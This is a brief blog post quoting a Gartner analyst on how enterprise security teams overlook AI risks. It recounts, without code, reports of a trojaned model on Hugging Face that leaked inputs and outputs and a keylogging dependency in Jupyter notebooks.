• July 15, 2024
  • roman
  • 0



Longtime Gartner analyst Avivah Litan (whose official title these days is Distinguished VP Analyst) wrote on LinkedIn recently about the cybersecurity dangers from these kinds of genAI efforts. Although her points were intended for security talent, the problems she describes are absolutely a bigger problem for IT.

“Enterprise AI is under the radar of most Security Operations, where staff don’t have the tools required to protect use of AI,” she wrote. “Traditional Appsec tools are inadequate when it comes to vulnerability scans for AI entities. Importantly, Security staff are often not involved in enterprise AI development and have little contact with data scientists and AI engineers. Meanwhile, attackers are busy uploading malicious models into Hugging Face, creating a new attack vector that most enterprises don’t bother to look at. 

“Noma Security reported they just detected a model a customer had downloaded that mimicked a well-known open-source LLM model. The attacker added a few lines of code that caused a forward function. Still, the model worked perfectly well, so the data scientists didn’t suspect anything. But every input to the model and every output from the model were also sent to the attacker, who was able to extract it all. Noma also discovered thousands of infected data science notebooks. They recently found a keylogging dependency that logged all activities on their customer’s Jupyter notebooks. The keylogger sent the captured activity to an unknown location, evading Security which didn’t have the Jupyter notebooks in its sights.”



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *